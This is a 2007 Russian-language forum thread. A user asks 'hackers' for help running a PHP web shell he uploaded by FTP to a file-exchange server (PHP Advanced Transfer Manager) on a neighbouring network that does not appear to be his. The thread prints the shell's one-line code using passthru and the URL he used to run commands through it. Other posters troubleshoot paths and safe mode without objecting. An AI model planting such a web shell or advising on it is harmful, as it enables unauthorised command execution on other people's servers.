Помогите товарищи хакеры :)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите товарищи хакеры :) - 2007-01-07 14:56:48.463333
|
|
|
xliver
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-07 14:35:20.726666
|
Есть у нас в сети ресурс.. Точнее в соседней сети, с которой у нас есть линк.
ОС: FreeBSD 5.3
На серваке стоит система обмена файлами PHP Advanced Transfer Manager 1.30 (далее PATM)
Вот с ней я и хочу поработать..
На ФТП этого сервака есть папка "Обменник", которая являетсья корневой папкой PATM
Замутил я cmd.php с содержанием:
<pre>
<? passthru($cmd); ?>
</pre>
Решил попробовать загрузить файл онлайн, через форму PATM, но не разрешил :) Я этого ожидал..
Мой децкий мозк подумал и надумал скинуть cmd.php через фтп в "Обменник"
Закинул, появился он в списке файлов PATM
Пишу http://сайт/share/files/cmd.php?cmd=ls -la (share - корень PATM)
И не находит этот файл. Как мне узнать путь до этого файла?
Заранее спасибо за помощь :)
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-07 16:28:19.770000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
1.Скорее всего твой файл вообще не залился.
2.Посмотри по FTP - не в корневую ли ты папку его залил?
3.Если ты видешь свой шелл именно в папке http://сайт/share/files,
то скорее всего врублен Safe Mode и соостветственно passthru() запрещен.
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-07 19:12:12.876666
|
|
|
xliver
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-07 14:35:20.726666
|
1) файл залил 100%
2) не в корневую, а в подпапку ftp://адрес/Incomming/Обменник
3) я думаю, что все файлы лежат не в /share/files, ибо любой файл, допустим 2raumwohnung_-_play.mp3 по ссылке http://адрес/share/files/2raumwohnung_-_play.mp3 тоже не досутпен.
Есть ещё какие-то предложения? оО
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-07 19:42:30.946666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Че тут предлагатьто? С чего ты вообще взял что ФТП папка доступна по http???
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-07 20:24:43.760000
|
|
|
xliver
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-07 14:35:20.726666
|
как это можно узнать?
Вообще путь этот где лежат все файлы??
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-07 21:05:54.340000
|
|
|
ZneP
Сообщений: 910
Оценки: 0
Присоединился: 2006-08-21 16:11:47
|
Обменник как раз то нужен для того, чтобы все туда заливали свои файлы, а админ потом их расскидывал по нужным каталогам
По крайней мере у нас так заведено, кидаем в папку Incomming на ФТП, а админ их уже расскидывает по папкам
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-07 23:21:20.756666
|
|
|
xliver
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-07 14:35:20.726666
|
Ну в моем случае файлы без проверки сразу попадают в онлайн.. и ни кем не фильтруються..
|
|
|
|
|
RE: Помогите товарищи хакеры :) - 2007-01-08 18:28:13.223333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Ты в этом уверен? И кто тебе сказал, что /share - корневая папка Обменника?
|
|
|
|
|
|
